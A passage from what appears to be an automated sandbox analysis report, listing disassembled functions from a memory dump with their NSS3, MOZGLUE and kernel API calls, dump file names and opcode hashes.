                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C489CE8
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D01
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D38
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D4D
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C489D70
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C489DC3
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C489DDD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4888D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C490725,00000000,00000058), ref: 6C488906
                                                                                                                                                                                                                                                        • Part of subcall function 6C4888D0: EnterCriticalSection.KERNEL32(?), ref: 6C48891A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4888D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C48894A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4888D0: calloc.MOZGLUE(00000001,6C49072D,00000000,00000000,00000000,?,6C490725,00000000,00000058), ref: 6C488959
                                                                                                                                                                                                                                                        • Part of subcall function 6C4888D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C488993
                                                                                                                                                                                                                                                        • Part of subcall function 6C4888D0: PR_Unlock.NSS3(?), ref: 6C4889AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3394263606-0
                                                                                                                                                                                                                                                      • Opcode ID: 51556b306c9cfb1592132b2c97adb98e2d672a3852492fd2c1e57750c2a9fa91
                                                                                                                                                                                                                                                      • Instruction ID: fbdaa9dc08f2a42e21db6212135c4e6454806ce17cf23ab395012322e5b06832
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51556b306c9cfb1592132b2c97adb98e2d672a3852492fd2c1e57750c2a9fa91
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85515EB0A06B058FDB00EF68C484E5ABBF0BF54359F15852DD8989BB10EB31E884CBD5
                                                                                                                                                                                                                                                      Function 6C589EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C589EC0
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C589EF9
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C589F73
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C589FA5
                                                                                                                                                                                                                                                      • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C589FCF
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C589FF2
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C58A01D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSection
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1904992153-0
                                                                                                                                                                                                                                                      • Opcode ID: 45b8d8a35fa4420bdea1defad4ac42646f9b35ffbf93b8fcce8d1b3ebcaaea86
                                                                                                                                                                                                                                                      • Instruction ID: 9387f445e063be9b56ddade04ef2548801ece252d37e5cc4fe75a0396a33995e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b8d8a35fa4420bdea1defad4ac42646f9b35ffbf93b8fcce8d1b3ebcaaea86
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00519EB2801621CBCB109F25DC8064AB7B4BF84319F15856AD8595BB52EB31FC89CBA1
                                                                                                                                                                                                                                                      Function 6C47DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C47DCFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C47DD40
                                                                                                                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C47DD62
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C47DD71
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C47DD81
                                                                                                                                                                                                                                                      • CERT_RemoveCertListNode.NSS3(?), ref: 6C47DD8F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: TlsGetValue.KERNEL32 ref: 6C4906C2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: EnterCriticalSection.KERNEL32(?), ref: 6C4906D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: PR_Unlock.NSS3 ref: 6C4906EB
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C47DD9E
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C47DDB7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 653623313-0
                                                                                                                                                                                                                                                      • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                      • Instruction ID: 951e07abbb6edc24c6003d1ad8f3015c9ea29b90f8e48e027300086499736b0c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91218CB6E011259BEF21DEA4DD40DDEBBB4AF05219B190024E818A7701F722ED158BF2
                                                                                                                                                                                                                                                      Function 6C505F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505F72
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46ED8F
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46ED9E
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46EDA4
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505F8F
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FCC
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FD3
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FF4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FFB
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506019
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506036
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSection$DestroyMonitor$free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 227462623-0
                                                                                                                                                                                                                                                      • Opcode ID: 7f83e505bea8e8846bbdb8aca8d1c25ac517a7064b6d84c380f03ce62049486f
                                                                                                                                                                                                                                                      • Instruction ID: 77c2f00d9a5bd523010c8d507d744ad8f6534092b70bc552a68148168edacf50
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f83e505bea8e8846bbdb8aca8d1c25ac517a7064b6d84c380f03ce62049486f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 392127F1604B019BEA10DF75DC48BD777E8AB41748F10082CE46AC7640EB36F118CB91
                                                                                                                                                                                                                                                      Function 6C580860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_LogFlush.NSS3(00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58086C
                                                                                                                                                                                                                                                        • Part of subcall function 6C580930: EnterCriticalSection.KERNEL32(?,00000000,?,6C580C83), ref: 6C58094F
                                                                                                                                                                                                                                                        • Part of subcall function 6C580930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C580C83), ref: 6C580974
                                                                                                                                                                                                                                                        • Part of subcall function 6C580930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C580983
                                                                                                                                                                                                                                                        • Part of subcall function 6C580930: _PR_MD_UNLOCK.NSS3(?,?,6C580C83), ref: 6C58099F
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58087D
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C580892
                                                                                                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C58798A), ref: 6C5808AA
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808C7
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808E9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808EF
                                                                                                                                                                                                                                                      • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58090E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3145526462-0
                                                                                                                                                                                                                                                      • Opcode ID: 369b97973a35bef26799b70b4e954bbfde27a7f3bc19dbf12e86c7441e9cb40d
                                                                                                                                                                                                                                                      • Instruction ID: df9ea1bc3f69ee230b87d0edceb9c08c6d1960b21ffcf948cfd7bf5c245d679b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 369b97973a35bef26799b70b4e954bbfde27a7f3bc19dbf12e86c7441e9cb40d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF1181B1B033504BFB00AB54DC5574B3778AB81368F1E0125E41547A40DB31F945CBDE
                                                                                                                                                                                                                                                      Function 6C473C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,6C4E460B,?,?), ref: 6C473CA9
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C473CB9
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?), ref: 6C473CC9
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C473CD6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C473CE6
                                                                                                                                                                                                                                                      • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C473CF6
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C473D03
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C473D15
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1376842649-0
                                                                                                                                                                                                                                                      • Opcode ID: f1550bde22533cf8fe35c15584988cd996f0913420ab340266378a70d1f4e9c0
                                                                                                                                                                                                                                                      • Instruction ID: dec37ac7a78f4657409fe128189a0dd0f2ec1b51f5bae679914ffa708447dd8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1550bde22533cf8fe35c15584988cd996f0913420ab340266378a70d1f4e9c0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6112C7AE41514A7EB11A724EC05DE67A38EB0225DF160134ED1843B11F722ED58C7E5
                                                                                                                                                                                                                                                      Function 6C58B850 Relevance: 12.0, APIs: 8, Instructions: 47COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B862
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B869
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B88A
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B891
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6C58798A), ref: 6C58B8B9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58B8C0
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B8E1
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B8E8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2988086103-0
                                                                                                                                                                                                                                                      • Opcode ID: 8d4b2953fb45cfef5349d5d845ae26efd17092d3e787e35de6eb57bcb15c45c1
                                                                                                                                                                                                                                                      • Instruction ID: 412f42208b9467f626ac00b7c5358d745b5cfe88545c31a079185b238a5da65b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d4b2953fb45cfef5349d5d845ae26efd17092d3e787e35de6eb57bcb15c45c1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 411100B2A02B209BDF10EFA0DC0C74A3778BB0A754F464118E51657A40D335BA4ACBDD
                                                                                                                                                                                                                                                      Function 6C479C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4911C0: PR_NewLock.NSS3 ref: 6C491216
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C479E17
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C479E25
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C479E4E
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C479EA2
                                                                                                                                                                                                                                                        • Part of subcall function 6C489500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C489546
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C479EB6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C479ED9
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C479F18
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3381623595-0
                                                                                                                                                                                                                                                      • Opcode ID: c4dee840f530c43538a817539e29616e92b15f98ce126a534711e51c2ca1623a
                                                                                                                                                                                                                                                      • Instruction ID: d39485737f38312b1e3675c72573b52997b12688e31101f88bb073e1cf0e9f68
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4dee840f530c43538a817539e29616e92b15f98ce126a534711e51c2ca1623a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1781D3B5A01601ABEB20DF34DC40EEB77A9BF65249F14452CE84987B41FB32E918C7E1
                                                                                                                                                                                                                                                      Function 6C48DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(D958E852,6C491397,5B5F5EC0,?,?,6C48B1EE,2404110F,?,?), ref: 6C48AB3C
